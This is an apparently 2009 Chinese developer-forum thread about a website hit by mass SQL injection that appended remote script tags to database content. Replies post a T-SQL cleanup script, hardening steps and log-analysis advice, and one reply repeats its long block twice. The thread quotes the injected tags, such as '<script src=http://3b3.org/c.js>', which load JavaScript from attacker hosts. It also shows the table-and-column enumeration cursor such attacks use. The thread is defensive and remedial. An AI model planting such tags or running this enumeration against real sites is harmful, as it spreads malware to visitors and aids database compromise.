62,074
社区成员
发帖
与我相关
我的任务
分享高分求救 网站被黑了,有脚本注入
</title><script src=http://asa.ss.la/1.js></script>都是这种的代码
这是什么原因。是防止注入没做好,
还是服务器上的端口开的多
怎么防止这种的情况呢。。。
...全文
请发表友善的回复…
发表回复
tbzhang11 2009-10-20
- 打赏
- 举报
可怜啊
xqy_2007 2009-08-13
- 打赏
- 举报
经常做备份吧。
gdjlc 2009-08-13
- 打赏
- 举报
绝对原创:实战http://3b3.org/c.js恶意SQL注入
http://topic.csdn.net/u/20090326/11/5e584897-2dd7-4e10-af1b-9b48b146af8e.html?36211
如何最快速度删除?
" <script src=http://3b3.org/c.js> </script> "
---------------------------------------------------------------
进入SQL查询分析器
选择你的数据库
第一步:先sql表修改所有者为dbo
EXEC sp_MSforeachtable 'exec sp_changeobjectowner ' '? ' ', ' 'dbo ' ' '
第二步:统一删除字段被挂的js
declare @delStr nvarchar(500)
set @delStr= ' <script src=http://3b3.org/c.js> </script> '
set nocount on
declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)
set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype= 'U '
open cur
fetch next from cur into @tableName,@tbID
while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,35) 为char,varchar,nchar,nvarchar,text类型
select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql= 'update [ ' + @tableName + '] set [ '+ @columnName + ']= replace([ '+@columnName+ '], ' ' '+@delStr+ ' ' ', ' ' ' ') where [ '+@columnName+ '] like ' '% '+@delStr+ '% ' ' '
exec sp_executesql @sql
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow> 0
begin
print '表: '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '条记录; '
end
fetch next from cur1 into @columnName
end
close cur1
deallocate cur1
fetch next from cur into @tableName,@tbID
end
print '数据库共有 '+convert(varchar(10),@iResult)+ '条记录被更新!!! '
close cur
deallocate cur
set nocount off
---------------------------------------------------------------
彻底杜绝SQL注入
1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
让3b3.org c.js注入见鬼去吧!
http://topic.csdn.net/u/20090326/11/5e584897-2dd7-4e10-af1b-9b48b146af8e.html?36211
如何最快速度删除?
" <script src=http://3b3.org/c.js> </script> "
---------------------------------------------------------------
进入SQL查询分析器
选择你的数据库
第一步:先sql表修改所有者为dbo
EXEC sp_MSforeachtable 'exec sp_changeobjectowner ' '? ' ', ' 'dbo ' ' '
第二步:统一删除字段被挂的js
declare @delStr nvarchar(500)
set @delStr= ' <script src=http://3b3.org/c.js> </script> '
set nocount on
declare @tableName nvarchar(100),@columnName nvarchar(100),@tbID int,@iRow int,@iResult int
declare @sql nvarchar(500)
set @iResult=0
declare cur cursor for
select name,id from sysobjects where xtype= 'U '
open cur
fetch next from cur into @tableName,@tbID
while @@fetch_status=0
begin
declare cur1 cursor for
--xtype in (231,167,239,175,35) 为char,varchar,nchar,nvarchar,text类型
select name from syscolumns where xtype in (231,167,239,175,35) and id=@tbID
open cur1
fetch next from cur1 into @columnName
while @@fetch_status=0
begin
set @sql= 'update [ ' + @tableName + '] set [ '+ @columnName + ']= replace([ '+@columnName+ '], ' ' '+@delStr+ ' ' ', ' ' ' ') where [ '+@columnName+ '] like ' '% '+@delStr+ '% ' ' '
exec sp_executesql @sql
set @iRow=@@rowcount
set @iResult=@iResult+@iRow
if @iRow> 0
begin
print '表: '+@tableName+ ',列: '+@columnName+ '被更新 '+convert(varchar(10),@iRow)+ '条记录; '
end
fetch next from cur1 into @columnName
end
close cur1
deallocate cur1
fetch next from cur into @tableName,@tbID
end
print '数据库共有 '+convert(varchar(10),@iResult)+ '条记录被更新!!! '
close cur
deallocate cur
set nocount off
---------------------------------------------------------------
彻底杜绝SQL注入
1.不要使用sa用户连接数据库
2、新建一个public权限数据库用户,并用这个用户访问数据库
3、[角色]去掉角色public对sysobjects与syscolumns对象的select访问权限
4、[用户]用户名称-> 右键-属性-权限-在sysobjects与syscolumns上面打“×”
5、通过以下代码检测(失败表示权限正确,如能显示出来则表明权限太高):
DECLARE @T varchar(255),
@C varchar(255)
DECLARE Table_Cursor CURSOR FOR
Select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype= 'u ' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN print @c
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
---------------------------------------------------------------
让3b3.org c.js注入见鬼去吧!
ttg520 2009-08-13
- 打赏
- 举报
你在网上搜一下 SQl盲注 我们的数据库的所有表都被注入了 现在已经解决
24K純帥 2009-08-12
- 打赏
- 举报
喔,这和网站注入有关系哇
imshi 2009-08-12
- 打赏
- 举报
应该先分析日志,再做结论,不一定就是sql注入的
程序漫步 2009-08-12
- 打赏
- 举报
是的 要分析IIS 我也被注入了。。。注意分析IIS 日志 里。。
yigeming 2009-08-12
- 打赏
- 举报
那怎么能在iis中看到他的注入记录啊,我这几天看了看iis的日志,也没有看出来,他是怎么注入的。
注入总的有个注入口把,我也没有找到啊。
注入总的有个注入口把,我也没有找到啊。
xzq686 2009-08-10
- 打赏
- 举报
FTP外漏也可能引起这种问题..
有些文本编辑器也有漏洞..
无孔不入呀..先找找服务器的问题吧.
有些文本编辑器也有漏洞..
无孔不入呀..先找找服务器的问题吧.
imshi 2009-08-10
- 打赏
- 举报
有的不一定是注入的,也和服务商的管理水平有关,要看日志分析后才能确诊
杰子 2009-08-10
- 打赏
- 举报
http://topic.csdn.net/u/20090729/14/26381958-0D6E-4B90-BC90-D275E9621F93.html
这个总结的很好
这个总结的很好
Lovely_baby 2009-08-10
- 打赏
- 举报
应该就是 局域网攻击
woying5510 2009-08-10
- 打赏
- 举报
看到好多人发这种贴
感觉安全很重要啊
感觉安全很重要啊
xiedu414 2009-08-10
- 打赏
- 举报
这事归服务器提供商管
zhang17 2009-08-10
- 打赏
- 举报
md 跟楼主一样我也被这玩意弄了 所有页面都加防注入代码了 还是被搞了
MasDn 2009-08-10
- 打赏
- 举报
你先看看你的页面文件是不是真的存在这一条,
如果没有
极有可能是服务器被黑了
如果没有
极有可能是服务器被黑了
chenwei175528 2009-08-10
- 打赏
- 举报
mark and up and study
ws_hgo 2009-08-09
- 打赏
- 举报
http://www.cnblogs.com/skl99/archive/2009/01/19/1378194.html
newdigitime 2009-08-09
- 打赏
- 举报
安全第一啊.
wuyq11 2009-08-09
- 打赏
- 举报
加载更多回复(3)
